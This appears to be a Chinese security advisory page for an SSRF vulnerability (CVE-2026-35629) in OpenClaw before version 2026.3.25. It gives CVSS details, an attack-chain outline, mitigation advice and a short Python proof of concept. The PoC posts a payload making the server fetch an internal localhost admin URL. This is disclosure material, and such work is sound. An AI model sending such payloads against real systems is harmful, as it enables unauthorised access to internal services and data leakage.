CVE-2026-35629 CVSS 7.4 高危

CVE-2026-35629 OpenClaw服务端请求伪造漏洞

披露日期: 2026-04-09

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-35629

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.3.25之前版本存在服务器端请求伪造（SSRF）漏洞。该漏洞源于多个渠道扩展未能正确保护配置的基础URL。攻击者可利用未受保护的fetch()调用，将请求重新绑定到受阻止的内部目标，从而访问受限资源。

技术细节

该漏洞位于OpenClaw的多个渠道扩展组件中，根本原因是应用程序对用户配置的基础URL（Base URL）缺乏有效的安全校验机制。在处理外部请求时，代码直接使用了未受保护的fetch()函数，且未对目标地址进行严格的过滤或黑名单检查。攻击者可以通过构造特定的恶意请求，利用DNS重绑定技术或绕过简单的URL校验逻辑，将原本指向外部合法地址的请求重定向至内部受限制的地址（如127.0.0.1或内网敏感端口）。由于CVSS向量显示范围改变（S:C），攻击者不仅能窃取内部服务的敏感数据，还可能对系统的机密性、完整性和可用性造成进一步影响。

攻击链分析

STEP 1

侦察

攻击者识别出目标使用了OpenClaw服务，且版本低于2026.3.25。

STEP 2

漏洞利用

攻击者向受影响的渠道扩展接口发送特制的HTTP请求，在参数中注入内部目标地址（如127.0.0.1或内网IP）。

STEP 3

请求重绑定

由于未受保护的fetch()调用，服务器端将请求发送至攻击者指定的内部受限地址。

STEP 4

数据访问

攻击者成功获取内部敏感资源（如元数据服务、内部API响应），导致信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-35629: OpenClaw SSRF
# This script demonstrates how an attacker might exploit the unguarded fetch() call
# to access an internal resource (e.g., localhost metadata).

target_url = "http://vulnerable-openclaw-instance/api/channel/fetch"

# Malicious payload targeting an internal endpoint
# Using a rebinding technique or direct IP bypass if allowed
payload = {
    "channel_id": "vulnerable_extension",
    "target_url": "http://127.0.0.1:8080/internal/admin/config"
}

try:
    print("[*] Attempting to send SSRF payload to OpenClaw...")
    response = requests.post(target_url, json=payload, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check for internal data leakage.")
        print("[+] Response snippet:")
        print(response.text[:500])
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

建议在网络边界部署防火墙规则，禁止OpenClaw服务器访问非必要的外部及内部网络段；在未完成升级前，临时禁用存在漏洞的渠道扩展功能。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表